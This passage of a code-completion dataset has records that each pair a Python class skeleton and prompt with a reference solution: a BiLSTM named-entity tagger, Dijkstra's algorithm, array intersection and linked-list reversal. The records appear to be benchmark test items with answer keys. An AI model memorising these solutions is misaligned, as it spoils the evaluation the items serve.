self._dropout(sentences_embeddings_reshaped)\n nerbilstm_output, _ = self._nerbilstm(sentences_embeddings_dropout)\n nerbilstm_dropout_output = self._dropout(nerbilstm_output)\n linear_output = self._hidden2tag(nerbilstm_dropout_output)\n tag_probs = torch.nn.functional.log_softmax(linear_output, dim=2)\n return tag_probs\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000312", "length_bytes": 20493, "license_type": "no_license", "methods": [{"docstring": "TODO: - Initialize the layer of the models: - *Unfrozen* embeddings of shape (V, D) which are loaded with pre-trained weights (`pretrained_embeddings`) - BiLSTM layer with hidden size of H/2 per direction - Linear layer with output of shape C Where: V - size of the vocabulary D - size of a word embedding H - size of the hidden layer C - number of classes being predicted Hints: - For the input dimension of the BiLSTM, think about the size of an embedded word representation", "name": "__init__", "signature": "def __init__(self, helper, config, pretrained_embeddings)"}, {"docstring": "TODO: - Perform the forward pass of the model, according to the model description in the handout: 1. Get the embeddings of the input 2. Apply dropout on the output of 1 3. Pass the output of 2 through the BiLSTM layer 4. Apply dropout on the output of 3 5. Pass the output of 4 through the linear layer 6. Perform softmax on the output of 5 to get tag_probs Hints: - Reshape the output of the embeddings layer so the full representation of an embedded word fits in one dimension. You might find the .view method of a tensor helpful. Args: - sentences: The input tensor of shape (batch_size, max_length, n_features) Returns: - tag_probs: A tensor of shape (batch_size, max_length, n_classes) which rep", "name": "forward", "signature": "def forward(self, sentences)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_004670", "prompt": "Implement the Python class `NerBiLstmModel` described below.\n\nClass description:\nImplements a BiLSTM network with an embedding layer and single hidden layer. This network will predict a sequence of labels (e.g. PER) for a given token (e.g. 
Henry) using a featurized window around the token.\n\nMethod signatures and docstrings:\n- def __init__(self, helper, config, pretrained_embeddings): TODO: - Initialize the layer of the models: - *Unfrozen* embeddings of shape (V, D) which are loaded with pre-trained weights (`pretrained_embeddings`) - BiLSTM layer with hidden size of H/2 per direction - Linear layer with output of shape C Where: V - size of the vocabulary D - size of a word embedding H - size of the hidden layer C - number of classes being predicted Hints: - For the input dimension of the BiLSTM, think about the size of an embedded word representation\n- def forward(self, sentences): TODO: - Perform the forward pass of the model, according to the model description in the handout: 1. Get the embeddings of the input 2. Apply dropout on the output of 1 3. Pass the output of 2 through the BiLSTM layer 4. Apply dropout on the output of 3 5. Pass the output of 4 through the linear layer 6. Perform softmax on the output of 5 to get tag_probs Hints: - Reshape the output of the embeddings layer so the full representation of an embedded word fits in one dimension. You might find the .view method of a tensor helpful. Args: - sentences: The input tensor of shape (batch_size, max_length, n_features) Returns: - tag_probs: A tensor of shape (batch_size, max_length, n_classes) which rep", "prompted_full_text": "Implement the Python class `NerBiLstmModel` described below.\n\nClass description:\nImplements a BiLSTM network with an embedding layer and single hidden layer. This network will predict a sequence of labels (e.g. PER) for a given token (e.g. Henry) using a featurized window around the token.\n\nMethod signatures and docstrings:\n- def __init__(self, helper, config, pretrained_embeddings): TODO: - Initialize the layer of the models: - *Unfrozen* embeddings of shape (V, D) which are loaded with pre-trained weights (`pretrained_embeddings`) - BiLSTM layer with hidden size of H/2 per direction - Linear layer with output of shape C Where: V - size of the vocabulary D - size of a word embedding H - size of the hidden layer C - number of classes being predicted Hints: - For the input dimension of the BiLSTM, think about the size of an embedded word representation\n- def forward(self, sentences): TODO: - Perform the forward pass of the model, according to the model description in the handout: 1. Get the embeddings of the input 2. Apply dropout on the output of 1 3. Pass the output of 2 through the BiLSTM layer 4. Apply dropout on the output of 3 5. Pass the output of 4 through the linear layer 6. Perform softmax on the output of 5 to get tag_probs Hints: - Reshape the output of the embeddings layer so the full representation of an embedded word fits in one dimension. You might find the .view method of a tensor helpful. Args: - sentences: The input tensor of shape (batch_size, max_length, n_features) Returns: - tag_probs: A tensor of shape (batch_size, max_length, n_classes) which rep\n\n<|skeleton|>\nclass NerBiLstmModel:\n \"\"\"Implements a BiLSTM network with an embedding layer and single hidden layer. This network will predict a sequence of labels (e.g. PER) for a given token (e.g. 
Henry) using a featurized window around the token.\"\"\"\n\n def __init__(self, helper, config, pretrained_embeddings):\n \"\"\"TODO: - Initialize the layer of the models: - *Unfrozen* embeddings of shape (V, D) which are loaded with pre-trained weights (`pretrained_embeddings`) - BiLSTM layer with hidden size of H/2 per direction - Linear layer with output of shape C Where: V - size of the vocabulary D - size of a word embedding H - size of the hidden layer C - number of classes being predicted Hints: - For the input dimension of the BiLSTM, think about the size of an embedded word representation\"\"\"\n <|body_0|>\n\n def forward(self, sentences):\n \"\"\"TODO: - Perform the forward pass of the model, according to the model description in the handout: 1. Get the embeddings of the input 2. Apply dropout on the output of 1 3. Pass the output of 2 through the BiLSTM layer 4. Apply dropout on the output of 3 5. Pass the output of 4 through the linear layer 6. Perform softmax on the output of 5 to get tag_probs Hints: - Reshape the output of the embeddings layer so the full representation of an embedded word fits in one dimension. You might find the .view method of a tensor helpful. Args: - sentences: The input tensor of shape (batch_size, max_length, n_features) Returns: - tag_probs: A tensor of shape (batch_size, max_length, n_classes) which rep\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n super(NerBiLstmModel, self).__init__()\n self.config = config\n self._max_length = min(config.max_length, helper.max_length)\n self._dropout = torch.nn.Dropout(config.dropout)\n self._embeddings = torch.nn.Embedding.from_pretrained(pretrained_embeddings, freeze=False)\n self._nerbilstm = torch.nn.LSTM(input_size=config.embed_size * config.n_features, hidden_size=config.hidden_size // 2, batch_first=True, bidirectional=True)\n self._hidden2tag = torch.nn.Linear(in_features=config.hidden_size, out_features=config.n_classes)\n<|end_body_0|>\n\n<|body_start_1|>\n batch_size, seq_length = (sentences.shape[0], sentences.shape[1])\n sentences_embeddings = sentences.long().view((batch_size, seq_length * self.config.n_features))\n sentences_embeddings_reshaped = self._embeddings(sentences_embeddings).view(batch_size, seq_length, -1)\n sentences_embeddings_dropout = self._dropout(sentences_embeddings_reshaped)\n nerbilstm_output, _ = self._nerbilstm(sentences_embeddings_dropout)\n nerbilstm_dropout_output = self._dropout(nerbilstm_output)\n linear_output = self._hidden2tag(nerbilstm_dropout_output)\n tag_probs = torch.nn.functional.log_softmax(linear_output, dim=2)\n return tag_probs\n<|end_body_1|>\n", "revision_id": "b15acc98448341802562d1ccb43924c97560d530", "skeleton": "<|skeleton|>\nclass NerBiLstmModel:\n \"\"\"Implements a BiLSTM network with an embedding layer and single hidden layer. This network will predict a sequence of labels (e.g. PER) for a given token (e.g. 
Henry) using a featurized window around the token.\"\"\"\n\n def __init__(self, helper, config, pretrained_embeddings):\n \"\"\"TODO: - Initialize the layer of the models: - *Unfrozen* embeddings of shape (V, D) which are loaded with pre-trained weights (`pretrained_embeddings`) - BiLSTM layer with hidden size of H/2 per direction - Linear layer with output of shape C Where: V - size of the vocabulary D - size of a word embedding H - size of the hidden layer C - number of classes being predicted Hints: - For the input dimension of the BiLSTM, think about the size of an embedded word representation\"\"\"\n <|body_0|>\n\n def forward(self, sentences):\n \"\"\"TODO: - Perform the forward pass of the model, according to the model description in the handout: 1. Get the embeddings of the input 2. Apply dropout on the output of 1 3. Pass the output of 2 through the BiLSTM layer 4. Apply dropout on the output of 3 5. Pass the output of 4 through the linear layer 6. Perform softmax on the output of 5 to get tag_probs Hints: - Reshape the output of the embeddings layer so the full representation of an embedded word fits in one dimension. You might find the .view method of a tensor helpful. Args: - sentences: The input tensor of shape (batch_size, max_length, n_features) Returns: - tag_probs: A tensor of shape (batch_size, max_length, n_classes) which rep\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class NerBiLstmModel:\n \"\"\"Implements a BiLSTM network with an embedding layer and single hidden layer. This network will predict a sequence of labels (e.g. PER) for a given token (e.g. Henry) using a featurized window around the token.\"\"\"\n\n def __init__(self, helper, config, pretrained_embeddings):\n \"\"\"TODO: - Initialize the layer of the models: - *Unfrozen* embeddings of shape (V, D) which are loaded with pre-trained weights (`pretrained_embeddings`) - BiLSTM layer with hidden size of H/2 per direction - Linear layer with output of shape C Where: V - size of the vocabulary D - size of a word embedding H - size of the hidden layer C - number of classes being predicted Hints: - For the input dimension of the BiLSTM, think about the size of an embedded word representation\"\"\"\n super(NerBiLstmModel, self).__init__()\n self.config = config\n self._max_length = min(config.max_length, helper.max_length)\n self._dropout = torch.nn.Dropout(config.dropout)\n self._embeddings = torch.nn.Embedding.from_pretrained(pretrained_embeddings, freeze=False)\n self._nerbilstm = torch.nn.LSTM(input_size=config.embed_size * config.n_features, hidden_size=config.hidden_size // 2, batch_first=True, bidirectional=True)\n self._hidden2tag = torch.nn.Linear(in_features=config.hidden_size, out_features=config.n_classes)\n\n def forward(self, sentences):\n \"\"\"TODO: - Perform the forward pass of the model, according to the model description in the handout: 1. Get the embeddings of the input 2. Apply dropout on the output of 1 3. Pass the output of 2 through the BiLSTM layer 4. Apply dropout on the output of 3 5. Pass the output of 4 through the linear layer 6. Perform softmax on the output of 5 to get tag_probs Hints: - Reshape the output of the embeddings layer so the full representation of an embedded word fits in one dimension. You might find the .view method of a tensor helpful. 
Args: - sentences: The input tensor of shape (batch_size, max_length, n_features) Returns: - tag_probs: A tensor of shape (batch_size, max_length, n_classes) which rep\"\"\"\n batch_size, seq_length = (sentences.shape[0], sentences.shape[1])\n sentences_embeddings = sentences.long().view((batch_size, seq_length * self.config.n_features))\n sentences_embeddings_reshaped = self._embeddings(sentences_embeddings).view(batch_size, seq_length, -1)\n sentences_embeddings_dropout = self._dropout(sentences_embeddings_reshaped)\n nerbilstm_output, _ = self._nerbilstm(sentences_embeddings_dropout)\n nerbilstm_dropout_output = self._dropout(nerbilstm_output)\n linear_output = self._hidden2tag(nerbilstm_dropout_output)\n tag_probs = torch.nn.functional.log_softmax(linear_output, dim=2)\n return tag_probs\n", "source": "the_stack_v2_python_sparse", "source_path": "nlp-hw3/Code/q5/ner_bilstm_model.py", "source_repo": "AvivYaniv/Natural-Language-Processing", "split": "test", "star_events_count": 3} {"blob_id": "5b4e24d6440b2c99c0d6c73619dd7000195279b6", "bodies": ["self.graph = graph\nself.nodes_heap = self.create_nodes_heap(graph)\nself.src = self.nodes_heap[self.nodes_heap.index(src)]\nself.dest = self.nodes_heap[self.nodes_heap.index(dest)]\nself.src.distance = 0\nheapify(self.nodes_heap)", "min_heap = []\nfor label, node in self.graph.nodes.items():\n node_container = NodeContainer(node)\n heappush(min_heap, node_container)\nreturn min_heap", "if self.dest.distance == float('inf'):\n self.build_shortest_path()\nreturn self.dest.distance", "if self.dest.distance == float('inf'):\n self.build_shortest_path()\ncurrent_node = self.dest\npath = [current_node.label]\nwhile current_node.previous:\n path.append(current_node.previous.label)\n current_node = current_node.previous\npath.reverse()\nreturn path", "while self.nodes_heap:\n current_node = heappop(self.nodes_heap)\n for node_label, edge_weight in enumerate(current_node.edges):\n if edge_weight and node_label in self.nodes_heap:\n neighbor = self.nodes_heap[self.nodes_heap.index(node_label)]\n if neighbor.distance > current_node.distance + edge_weight:\n neighbor.distance = current_node.distance + edge_weight\n neighbor.previous = current_node\n heapify(self.nodes_heap)"], "bodies_text": "<|body_start_0|>\n self.graph = graph\n self.nodes_heap = self.create_nodes_heap(graph)\n self.src = self.nodes_heap[self.nodes_heap.index(src)]\n self.dest = self.nodes_heap[self.nodes_heap.index(dest)]\n self.src.distance = 0\n heapify(self.nodes_heap)\n<|end_body_0|>\n\n<|body_start_1|>\n min_heap = []\n for label, node in self.graph.nodes.items():\n node_container = NodeContainer(node)\n heappush(min_heap, node_container)\n return min_heap\n<|end_body_1|>\n\n<|body_start_2|>\n if self.dest.distance == float('inf'):\n self.build_shortest_path()\n return self.dest.distance\n<|end_body_2|>\n\n<|body_start_3|>\n if self.dest.distance == float('inf'):\n self.build_shortest_path()\n current_node = self.dest\n path = [current_node.label]\n while current_node.previous:\n path.append(current_node.previous.label)\n current_node = current_node.previous\n path.reverse()\n return path\n<|end_body_3|>\n\n<|body_start_4|>\n while self.nodes_heap:\n current_node = heappop(self.nodes_heap)\n for node_label, edge_weight in enumerate(current_node.edges):\n if edge_weight and node_label in self.nodes_heap:\n neighbor = self.nodes_heap[self.nodes_heap.index(node_label)]\n if neighbor.distance > current_node.distance + edge_weight:\n neighbor.distance = current_node.distance + 
edge_weight\n neighbor.previous = current_node\n heapify(self.nodes_heap)\n<|end_body_4|>\n", "class_docstring": "", "class_name": "DijkstrasAlgorithm", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass DijkstrasAlgorithm:\n\n def __init__(self, graph, src, dest):\n \"\"\"Input: graph (AdjacencyMatrix) = AdjacencyMatrix to find shortest path/distance src (int): Source node to start search from dest (int): Destination node to end search at Output: DijkstrasAlgorithm\"\"\"\n <|body_0|>\n\n def create_nodes_heap(self, graph):\n \"\"\"Builds a min heap from the AdjacencyMatrix using node distances Input: graph (AdjacencyMatrix) = AdjacencyMatrix to build heap from Output: (list) adhering to min heap invariant\"\"\"\n <|body_1|>\n\n def shortest_distance(self):\n \"\"\"Input: Output: (int) representing shortest distance to the destination from the source\"\"\"\n <|body_2|>\n\n def shortest_path(self):\n \"\"\"Input: Output: (list) representing shortest path to the destination from the source\"\"\"\n <|body_3|>\n\n def build_shortest_path(self):\n \"\"\"Actual implementation of Dijkstras Algorithm to get shortest path Input: Output:\"\"\"\n <|body_4|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.graph = graph\n self.nodes_heap = self.create_nodes_heap(graph)\n self.src = self.nodes_heap[self.nodes_heap.index(src)]\n self.dest = self.nodes_heap[self.nodes_heap.index(dest)]\n self.src.distance = 0\n heapify(self.nodes_heap)\n<|end_body_0|>\n\n<|body_start_1|>\n min_heap = []\n for label, node in self.graph.nodes.items():\n node_container = NodeContainer(node)\n heappush(min_heap, node_container)\n return min_heap\n<|end_body_1|>\n\n<|body_start_2|>\n if self.dest.distance == float('inf'):\n self.build_shortest_path()\n return self.dest.distance\n<|end_body_2|>\n\n<|body_start_3|>\n if self.dest.distance == float('inf'):\n self.build_shortest_path()\n current_node = self.dest\n path = [current_node.label]\n while current_node.previous:\n path.append(current_node.previous.label)\n current_node = current_node.previous\n path.reverse()\n return path\n<|end_body_3|>\n\n<|body_start_4|>\n while self.nodes_heap:\n current_node = heappop(self.nodes_heap)\n for node_label, edge_weight in enumerate(current_node.edges):\n if edge_weight and node_label in self.nodes_heap:\n neighbor = self.nodes_heap[self.nodes_heap.index(node_label)]\n if neighbor.distance > current_node.distance + edge_weight:\n neighbor.distance = current_node.distance + edge_weight\n neighbor.previous = current_node\n heapify(self.nodes_heap)\n<|end_body_4|>\n", "id": "stack_v2_sparse_classes_10k_test_000313", "length_bytes": 5273, "license_type": "no_license", "methods": [{"docstring": "Input: graph (AdjacencyMatrix) = AdjacencyMatrix to find shortest path/distance src (int): Source node to start search from dest (int): Destination node to end search at Output: DijkstrasAlgorithm", "name": "__init__", "signature": "def __init__(self, graph, src, dest)"}, {"docstring": "Builds a min heap from the AdjacencyMatrix using node distances Input: graph (AdjacencyMatrix) = AdjacencyMatrix to build heap from Output: (list) adhering to min heap invariant", "name": "create_nodes_heap", "signature": "def create_nodes_heap(self, graph)"}, {"docstring": "Input: Output: (int) representing shortest distance to the destination from the source", "name": "shortest_distance", "signature": "def shortest_distance(self)"}, {"docstring": "Input: Output: (list) representing shortest path to the 
destination from the source", "name": "shortest_path", "signature": "def shortest_path(self)"}, {"docstring": "Actual implementation of Dijkstras Algorithm to get shortest path Input: Output:", "name": "build_shortest_path", "signature": "def build_shortest_path(self)"}], "n_methods": 5, "original_id": "stack_v2_sparse_classes_30k_train_002042", "prompt": "Implement the Python class `DijkstrasAlgorithm` described below.\n\nClass description:\nImplement the DijkstrasAlgorithm class.\n\nMethod signatures and docstrings:\n- def __init__(self, graph, src, dest): Input: graph (AdjacencyMatrix) = AdjacencyMatrix to find shortest path/distance src (int): Source node to start search from dest (int): Destination node to end search at Output: DijkstrasAlgorithm\n- def create_nodes_heap(self, graph): Builds a min heap from the AdjacencyMatrix using node distances Input: graph (AdjacencyMatrix) = AdjacencyMatrix to build heap from Output: (list) adhering to min heap invariant\n- def shortest_distance(self): Input: Output: (int) representing shortest distance to the destination from the source\n- def shortest_path(self): Input: Output: (list) representing shortest path to the destination from the source\n- def build_shortest_path(self): Actual implementation of Dijkstras Algorithm to get shortest path Input: Output:", "prompted_full_text": "Implement the Python class `DijkstrasAlgorithm` described below.\n\nClass description:\nImplement the DijkstrasAlgorithm class.\n\nMethod signatures and docstrings:\n- def __init__(self, graph, src, dest): Input: graph (AdjacencyMatrix) = AdjacencyMatrix to find shortest path/distance src (int): Source node to start search from dest (int): Destination node to end search at Output: DijkstrasAlgorithm\n- def create_nodes_heap(self, graph): Builds a min heap from the AdjacencyMatrix using node distances Input: graph (AdjacencyMatrix) = AdjacencyMatrix to build heap from Output: (list) adhering to min heap invariant\n- def shortest_distance(self): Input: Output: (int) representing shortest distance to the destination from the source\n- def shortest_path(self): Input: Output: (list) representing shortest path to the destination from the source\n- def build_shortest_path(self): Actual implementation of Dijkstras Algorithm to get shortest path Input: Output:\n\n<|skeleton|>\nclass DijkstrasAlgorithm:\n\n def __init__(self, graph, src, dest):\n \"\"\"Input: graph (AdjacencyMatrix) = AdjacencyMatrix to find shortest path/distance src (int): Source node to start search from dest (int): Destination node to end search at Output: DijkstrasAlgorithm\"\"\"\n <|body_0|>\n\n def create_nodes_heap(self, graph):\n \"\"\"Builds a min heap from the AdjacencyMatrix using node distances Input: graph (AdjacencyMatrix) = AdjacencyMatrix to build heap from Output: (list) adhering to min heap invariant\"\"\"\n <|body_1|>\n\n def shortest_distance(self):\n \"\"\"Input: Output: (int) representing shortest distance to the destination from the source\"\"\"\n <|body_2|>\n\n def shortest_path(self):\n \"\"\"Input: Output: (list) representing shortest path to the destination from the source\"\"\"\n <|body_3|>\n\n def build_shortest_path(self):\n \"\"\"Actual implementation of Dijkstras Algorithm to get shortest path Input: Output:\"\"\"\n <|body_4|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.graph = graph\n self.nodes_heap = self.create_nodes_heap(graph)\n self.src = self.nodes_heap[self.nodes_heap.index(src)]\n self.dest = self.nodes_heap[self.nodes_heap.index(dest)]\n self.src.distance = 0\n 
heapify(self.nodes_heap)\n<|end_body_0|>\n\n<|body_start_1|>\n min_heap = []\n for label, node in self.graph.nodes.items():\n node_container = NodeContainer(node)\n heappush(min_heap, node_container)\n return min_heap\n<|end_body_1|>\n\n<|body_start_2|>\n if self.dest.distance == float('inf'):\n self.build_shortest_path()\n return self.dest.distance\n<|end_body_2|>\n\n<|body_start_3|>\n if self.dest.distance == float('inf'):\n self.build_shortest_path()\n current_node = self.dest\n path = [current_node.label]\n while current_node.previous:\n path.append(current_node.previous.label)\n current_node = current_node.previous\n path.reverse()\n return path\n<|end_body_3|>\n\n<|body_start_4|>\n while self.nodes_heap:\n current_node = heappop(self.nodes_heap)\n for node_label, edge_weight in enumerate(current_node.edges):\n if edge_weight and node_label in self.nodes_heap:\n neighbor = self.nodes_heap[self.nodes_heap.index(node_label)]\n if neighbor.distance > current_node.distance + edge_weight:\n neighbor.distance = current_node.distance + edge_weight\n neighbor.previous = current_node\n heapify(self.nodes_heap)\n<|end_body_4|>\n", "revision_id": "933e5db88fc0a19eeb8f78b0e7857cb3ab6a1048", "skeleton": "<|skeleton|>\nclass DijkstrasAlgorithm:\n\n def __init__(self, graph, src, dest):\n \"\"\"Input: graph (AdjacencyMatrix) = AdjacencyMatrix to find shortest path/distance src (int): Source node to start search from dest (int): Destination node to end search at Output: DijkstrasAlgorithm\"\"\"\n <|body_0|>\n\n def create_nodes_heap(self, graph):\n \"\"\"Builds a min heap from the AdjacencyMatrix using node distances Input: graph (AdjacencyMatrix) = AdjacencyMatrix to build heap from Output: (list) adhering to min heap invariant\"\"\"\n <|body_1|>\n\n def shortest_distance(self):\n \"\"\"Input: Output: (int) representing shortest distance to the destination from the source\"\"\"\n <|body_2|>\n\n def shortest_path(self):\n \"\"\"Input: Output: (list) representing shortest path to the destination from the source\"\"\"\n <|body_3|>\n\n def build_shortest_path(self):\n \"\"\"Actual implementation of Dijkstras Algorithm to get shortest path Input: Output:\"\"\"\n <|body_4|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class DijkstrasAlgorithm:\n def __init__(self, graph, src, dest):\n \"\"\"Input: graph (AdjacencyMatrix) = AdjacencyMatrix to find shortest path/distance src (int): Source node to start search from dest (int): Destination node to end search at Output: DijkstrasAlgorithm\"\"\"\n self.graph = graph\n self.nodes_heap = self.create_nodes_heap(graph)\n self.src = self.nodes_heap[self.nodes_heap.index(src)]\n self.dest = self.nodes_heap[self.nodes_heap.index(dest)]\n self.src.distance = 0\n heapify(self.nodes_heap)\n\n def create_nodes_heap(self, graph):\n \"\"\"Builds a min heap from the AdjacencyMatrix using node distances Input: graph (AdjacencyMatrix) = AdjacencyMatrix to build heap from Output: (list) adhering to min heap invariant\"\"\"\n min_heap = []\n for label, node in self.graph.nodes.items():\n node_container = NodeContainer(node)\n heappush(min_heap, node_container)\n return min_heap\n\n def shortest_distance(self):\n \"\"\"Input: Output: (int) representing shortest distance to the destination from the source\"\"\"\n if self.dest.distance == float('inf'):\n self.build_shortest_path()\n return self.dest.distance\n\n def shortest_path(self):\n \"\"\"Input: Output: (list) representing 
shortest path to the destination from the source\"\"\"\n if self.dest.distance == float('inf'):\n self.build_shortest_path()\n current_node = self.dest\n path = [current_node.label]\n while current_node.previous:\n path.append(current_node.previous.label)\n current_node = current_node.previous\n path.reverse()\n return path\n\n def build_shortest_path(self):\n \"\"\"Actual implementation of Dijkstras Algorithm to get shortest path Input: Output:\"\"\"\n while self.nodes_heap:\n current_node = heappop(self.nodes_heap)\n for node_label, edge_weight in enumerate(current_node.edges):\n if edge_weight and node_label in self.nodes_heap:\n neighbor = self.nodes_heap[self.nodes_heap.index(node_label)]\n if neighbor.distance > current_node.distance + edge_weight:\n neighbor.distance = current_node.distance + edge_weight\n neighbor.previous = current_node\n heapify(self.nodes_heap)\n", "source": "the_stack_v2_python_sparse", "source_path": "algorithms/search/dijkstras_algorithm/dijkstras_algorithm.py", "source_repo": "scottberke/algorithms", "split": "test", "star_events_count": 0} {"blob_id": "9f60fff98431a4911dc8d793b750592448ae60f2", "bodies": ["m = {}\nres = []\nfor i in nums1:\n m[i] = m.setdefault(i, 0) + 1\nfor i in nums2:\n if i in m and m[i] > 0:\n res.append(i)\n m[i] -= 1\nreturn res", "nums1.sort()\nnums2.sort()\ni, j = (0, 0)\nres = []\nwhile i < len(nums1) and j < len(nums2):\n if nums1[i] == nums2[j]:\n res.append(nums1[i])\n i += 1\n j += 1\n elif nums1[i] > nums2[j]:\n j += 1\n else:\n i += 1\nreturn res"], "bodies_text": "<|body_start_0|>\n m = {}\n res = []\n for i in nums1:\n m[i] = m.setdefault(i, 0) + 1\n for i in nums2:\n if i in m and m[i] > 0:\n res.append(i)\n m[i] -= 1\n return res\n<|end_body_0|>\n\n<|body_start_1|>\n nums1.sort()\n nums2.sort()\n i, j = (0, 0)\n res = []\n while i < len(nums1) and j < len(nums2):\n if nums1[i] == nums2[j]:\n res.append(nums1[i])\n i += 1\n j += 1\n elif nums1[i] > nums2[j]:\n j += 1\n else:\n i += 1\n return res\n<|end_body_1|>\n", "class_docstring": "", "class_name": "Solution", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Solution:\n\n def intersect(self, nums1, nums2):\n \"\"\":type nums1: List[int] :type nums2: List[int] :rtype: List[int]\"\"\"\n <|body_0|>\n\n def intersectSort(self, nums1, nums2):\n \"\"\":type nums1: List[int] :type nums2: List[int] :rtype: List[int]\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n m = {}\n res = []\n for i in nums1:\n m[i] = m.setdefault(i, 0) + 1\n for i in nums2:\n if i in m and m[i] > 0:\n res.append(i)\n m[i] -= 1\n return res\n<|end_body_0|>\n\n<|body_start_1|>\n nums1.sort()\n nums2.sort()\n i, j = (0, 0)\n res = []\n while i < len(nums1) and j < len(nums2):\n if nums1[i] == nums2[j]:\n res.append(nums1[i])\n i += 1\n j += 1\n elif nums1[i] > nums2[j]:\n j += 1\n else:\n i += 1\n return res\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000314", "length_bytes": 2765, "license_type": "no_license", "methods": [{"docstring": ":type nums1: List[int] :type nums2: List[int] :rtype: List[int]", "name": "intersect", "signature": "def intersect(self, nums1, nums2)"}, {"docstring": ":type nums1: List[int] :type nums2: List[int] :rtype: List[int]", "name": "intersectSort", "signature": "def intersectSort(self, nums1, nums2)"}], "n_methods": 2, "prompt": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def 
intersect(self, nums1, nums2): :type nums1: List[int] :type nums2: List[int] :rtype: List[int]\n- def intersectSort(self, nums1, nums2): :type nums1: List[int] :type nums2: List[int] :rtype: List[int]", "prompted_full_text": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def intersect(self, nums1, nums2): :type nums1: List[int] :type nums2: List[int] :rtype: List[int]\n- def intersectSort(self, nums1, nums2): :type nums1: List[int] :type nums2: List[int] :rtype: List[int]\n\n<|skeleton|>\nclass Solution:\n\n def intersect(self, nums1, nums2):\n \"\"\":type nums1: List[int] :type nums2: List[int] :rtype: List[int]\"\"\"\n <|body_0|>\n\n def intersectSort(self, nums1, nums2):\n \"\"\":type nums1: List[int] :type nums2: List[int] :rtype: List[int]\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n m = {}\n res = []\n for i in nums1:\n m[i] = m.setdefault(i, 0) + 1\n for i in nums2:\n if i in m and m[i] > 0:\n res.append(i)\n m[i] -= 1\n return res\n<|end_body_0|>\n\n<|body_start_1|>\n nums1.sort()\n nums2.sort()\n i, j = (0, 0)\n res = []\n while i < len(nums1) and j < len(nums2):\n if nums1[i] == nums2[j]:\n res.append(nums1[i])\n i += 1\n j += 1\n elif nums1[i] > nums2[j]:\n j += 1\n else:\n i += 1\n return res\n<|end_body_1|>\n", "revision_id": "810575368ecffa97677bdb51744d1f716140bbb1", "skeleton": "<|skeleton|>\nclass Solution:\n\n def intersect(self, nums1, nums2):\n \"\"\":type nums1: List[int] :type nums2: List[int] :rtype: List[int]\"\"\"\n <|body_0|>\n\n def intersectSort(self, nums1, nums2):\n \"\"\":type nums1: List[int] :type nums2: List[int] :rtype: List[int]\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Solution:\n def intersect(self, nums1, nums2):\n \"\"\":type nums1: List[int] :type nums2: List[int] :rtype: List[int]\"\"\"\n m = {}\n res = []\n for i in nums1:\n m[i] = m.setdefault(i, 0) + 1\n for i in nums2:\n if i in m and m[i] > 0:\n res.append(i)\n m[i] -= 1\n return res\n\n def intersectSort(self, nums1, nums2):\n \"\"\":type nums1: List[int] :type nums2: List[int] :rtype: List[int]\"\"\"\n nums1.sort()\n nums2.sort()\n i, j = (0, 0)\n res = []\n while i < len(nums1) and j < len(nums2):\n if nums1[i] == nums2[j]:\n res.append(nums1[i])\n i += 1\n j += 1\n elif nums1[i] > nums2[j]:\n j += 1\n else:\n i += 1\n return res\n", "source": "the_stack_v2_python_sparse", "source_path": "I/IntersectionofTwoArraysII.py", "source_repo": "bssrdf/pyleet", "split": "test", "star_events_count": 2} {"blob_id": "a6d8364debfbefb661b17e953da60075d6e6892e", "bodies": ["prev = None\nwhile head:\n next_node = head.next\n head.next = prev\n prev = head\n head = next_node\nreturn prev", "if not (head and head.next):\n return head\nres = self.reverseList(head.next)\nhead.next.next = head\nhead.next = None\nreturn res", "if not head:\n return head\nres = ListNode(0)\nwhile head:\n cur = res.next\n res.next = ListNode(head.val)\n res.next.next = cur\n head = head.next\nreturn res.next"], "bodies_text": "<|body_start_0|>\n prev = None\n while head:\n next_node = head.next\n head.next = prev\n prev = head\n head = next_node\n return prev\n<|end_body_0|>\n\n<|body_start_1|>\n if not (head and head.next):\n return head\n res = self.reverseList(head.next)\n head.next.next = head\n head.next = None\n return res\n<|end_body_1|>\n\n<|body_start_2|>\n if not head:\n return 
head\n res = ListNode(0)\n while head:\n cur = res.next\n res.next = ListNode(head.val)\n res.next.next = cur\n head = head.next\n return res.next\n<|end_body_2|>\n", "class_docstring": "", "class_name": "Solution", "detected_licenses": ["BSD-2-Clause"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Solution:\n\n def reverseList(self, head: Optional[ListNode]) -> Optional[ListNode]:\n \"\"\"Natural solutions (iteratively and recursively)\"\"\"\n <|body_0|>\n\n def reverseList1(self, head):\n \"\"\"recursively\"\"\"\n <|body_1|>\n\n def reverseList2(self, head):\n \"\"\"iteratively\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n prev = None\n while head:\n next_node = head.next\n head.next = prev\n prev = head\n head = next_node\n return prev\n<|end_body_0|>\n\n<|body_start_1|>\n if not (head and head.next):\n return head\n res = self.reverseList(head.next)\n head.next.next = head\n head.next = None\n return res\n<|end_body_1|>\n\n<|body_start_2|>\n if not head:\n return head\n res = ListNode(0)\n while head:\n cur = res.next\n res.next = ListNode(head.val)\n res.next.next = cur\n head = head.next\n return res.next\n<|end_body_2|>\n", "id": 